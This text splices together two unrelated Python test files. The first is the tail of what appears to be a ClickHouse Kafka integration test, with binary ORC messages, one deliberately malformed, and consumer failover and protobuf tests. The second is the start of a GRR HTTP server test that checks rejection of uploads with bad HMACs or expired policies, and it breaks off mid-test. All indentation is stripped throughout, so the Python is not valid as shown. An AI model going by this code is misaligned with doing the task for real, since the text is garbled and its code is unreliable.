b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Set up {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
logging.debug('Checking {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = ast.literal_eval(instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name)))
errors_expected = ast.literal_eval(format_opts['expected'])
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result['raw_message'] == errors_expected['raw_message'], 'Proper raw_message for format: {}'.format(format_name)
# Errors text can change, just checking prefixes
assert errors_expected['error'] in errors_result['error'], 'Proper error for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "kafka_consumer_failover"
kafka_create_topic(admin_client, topic_name, num_partitions=2)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
kafka_delete_topic(admin_client, topic_name)
def test_kafka_predefined_configuration(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = 'conf'
kafka_create_topic(admin_client, topic_name)
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, topic_name, messages)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64, value UInt64) ENGINE = Kafka(kafka1, kafka_format='CSV');
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
# https://github.com/ClickHouse/ClickHouse/issues/26643
def test_issue26643(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
topic_list = []
topic_list.append(NewTopic(name="test_issue26643", num_partitions=4, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
msg = message_with_repeated_pb2.Message(
tnow=1629000000,
server='server1',
clien='host1',
sPort=443,
cPort=50000,
r=[
message_with_repeated_pb2.dd(name='1', type=444, ttl=123123, data=b'adsfasd'),
message_with_repeated_pb2.dd(name='2')
],
method='GET'
)
data = b''
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
msg = message_with_repeated_pb2.Message(
tnow=1629000002
)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer.send(topic="test_issue26643", value=data)
data = _VarintBytes(len(serialized_msg)) + serialized_msg
producer.send(topic="test_issue26643", value=data)
producer.flush()
instance.query('''
CREATE TABLE IF NOT EXISTS test.test_queue
(
`tnow` UInt32,
`server` String,
`client` String,
`sPort` UInt16,
`cPort` UInt16,
`r.name` Array(String),
`r.class` Array(UInt16),
`r.type` Array(UInt16),
`r.ttl` Array(UInt32),
`r.data` Array(String),
`method` String
)
ENGINE = Kafka
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_issue26643',
kafka_group_name = 'test_issue26643_group',
kafka_format = 'Protobuf',
kafka_schema = 'message_with_repeated.proto:Message',
kafka_num_consumers = 4,
kafka_skip_broken_messages = 10000;
SET allow_suspicious_low_cardinality_types=1;
CREATE TABLE test.log
(
`tnow` DateTime CODEC(DoubleDelta, LZ4),
`server` LowCardinality(String),
`client` LowCardinality(String),
`sPort` LowCardinality(UInt16),
`cPort` UInt16 CODEC(T64, LZ4),
`r.name` Array(String),
`r.class` Array(LowCardinality(UInt16)),
`r.type` Array(LowCardinality(UInt16)),
`r.ttl` Array(LowCardinality(UInt32)),
`r.data` Array(String),
`method` LowCardinality(String)
)
ENGINE = MergeTree
PARTITION BY toYYYYMMDD(tnow)
ORDER BY (tnow, server)
TTL toDate(tnow) + toIntervalMonth(1000)
SETTINGS index_granularity = 16384, merge_with_ttl_timeout = 7200;
CREATE MATERIALIZED VIEW test.test_consumer TO test.log AS
SELECT
toDateTime(a.tnow) AS tnow,
a.server AS server,
a.client AS client,
a.sPort AS sPort,
a.cPort AS cPort,
a.`r.name` AS `r.name`,
a.`r.class` AS `r.class`,
a.`r.type` AS `r.type`,
a.`r.ttl` AS `r.ttl`,
a.`r.data` AS `r.data`,
a.method AS method
FROM test.test_queue AS a;
''')
instance.wait_for_log_line("Committed offset")
result = instance.query('SELECT * FROM test.log')
expected = '''\
2021-08-15 07:00:00 server1 443 50000 ['1','2'] [0,0] [444,0] [123123,0] ['adsfasd',''] GET
2021-08-15 07:00:02 0 0 [] [] [] [] []
2021-08-15 07:00:02 0 0 [] [] [] [] []
'''
assert TSV(result) == TSV(expected)
# kafka_cluster.open_bash_shell('instance')
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
frontend_test.py
|
#!/usr/bin/env python
"""Unittest for grr http server."""
import hashlib
import os
import socket
import threading
import ipaddr
import portpicker
import requests
import logging
from grr.client import comms
from grr.client.client_actions import standard
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import file_store
from grr.lib import flags
from grr.lib import flow
from grr.lib import front_end
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib import worker_mocks
from grr.lib.aff4_objects import filestore
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import file_finder as rdf_file_finder
from grr.lib.rdfvalues import paths as rdf_paths
from grr.tools import frontend
class GRRHTTPServerTest(test_lib.GRRBaseTest):
"""Test the http server."""
@classmethod
def setUpClass(cls):
super(GRRHTTPServerTest, cls).setUpClass()
# Frontend must be initialized to register all the stats counters.
front_end.FrontendInit().RunOnce()
# Bring up a local server for testing.
port = portpicker.PickUnusedPort()
ip = utils.ResolveHostnameToIP("localhost", port)
cls.httpd = frontend.GRRHTTPServer((ip, port),
frontend.GRRHTTPServerHandler)
if ipaddr.IPAddress(ip).version == 6:
cls.address_family = socket.AF_INET6
cls.base_url = "http://[%s]:%d/" % (ip, port)
else:
cls.address_family = socket.AF_INET4
cls.base_url = "http://%s:%d/" % (ip, port)
cls.httpd_thread = threading.Thread(target=cls.httpd.serve_forever)
cls.httpd_thread.daemon = True
cls.httpd_thread.start()
@classmethod
def tearDownClass(cls):
cls.httpd.shutdown()
def setUp(self):
super(GRRHTTPServerTest, self).setUp()
self.client_id = self.SetupClients(1)[0]
def testServerPem(self):
req = requests.get(self.base_url + "server.pem")
self.assertEqual(req.status_code, 200)
self.assertTrue("BEGIN CERTIFICATE" in req.content)
def _UploadFile(self, args):
with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}):
client = comms.GRRHTTPClient(
ca_cert=config_lib.CONFIG["CA.certificate"],
private_key=config_lib.CONFIG.Get("Client.private_key", default=None))
client.server_certificate = config_lib.CONFIG["Frontend.certificate"]
def MockSendReply(_, reply):
self.reply = reply
@classmethod
def FromPrivateKey(*_):
"""Returns the correct client id.
The test framework does not generate valid client ids (which should be
related to the client's private key. We therefore need to mock it and
override.
Returns:
Correct client_id
"""
return self.client_id
with utils.MultiStubber((standard.UploadFile, "SendReply", MockSendReply),
(rdf_client.ClientURN, "FromPrivateKey",
FromPrivateKey)):
action = standard.UploadFile(client.client_worker)
action.Run(args)
return self.reply
def testUpload(self):
magic_string = "Hello world"
test_file = os.path.join(self.temp_dir, "sample.txt")
with open(test_file, "wb") as fd:
fd.write(magic_string)
args = rdf_client.UploadFileRequest()
args.pathspec.path = test_file
args.pathspec.pathtype = "OS"
# Errors are logged on the server but not always provided to the client. We
# check the server logs for the errors we inject.
with test_lib.Instrument(logging, "error") as logger:
# First do not provide a hmac at all.
with self.assertRaises(IOError):
self._UploadFile(args)
self.assertRegexpMatches("HMAC not provided", str(logger.args))
logger.args[:] = []
# Now pass a rubbish HMAC but forget to give a policy.
hmac = args.upload_token.GetHMAC()
args.upload_token.hmac = hmac.HMAC("This is the wrong filename")
with self.assertRaises(IOError):
self._UploadFile(args)
self.assertRegexpMatches("Policy not provided", str(logger.args))
logger.args[:] = []
# Ok - lets make an expired policy, Still wrong HMAC.
policy = rdf_client.UploadPolicy(client_id=self.client_id, expires=1000)
args.upload_token.SetPolicy(policy)
with self.assertRaises(IOError):
self._UploadFile(args)
self.assertRegexpMatches("Signature did not match digest",
str(logger.args))
logger.args[:] = []
# Ok lets hmac the policy now, but its still too old.
args.upload_token.SetPolicy(policy)
with self.assertRaises(IOError):
self._UploadFile(args)
# Make sure the file is not written yet.
rootdir = config_lib.CONFIG["FileUploadFileStore.root_dir"]
target_filename = os.path.join(
rootdir, self.client_id.Add(test_file).Path().lstrip(os.path.sep))
self.assertNotEqual(target_filename, test_file)
with self.assertRaises(IOError):
open(target_filename)
self.assertRegexpMatches("Client upload policy is too old",
str(logger.args))
logger.args[:] = []
# Lets expire the policy in the future.
policy.expires = rdfvalue.RDFDatetime.Now() + 1000
args.upload_token.SetPolicy(policy)
args.upload_token.GenerateHMAC()
r = self._UploadFile(args)
fs = file_store.FileUploadFileStore()
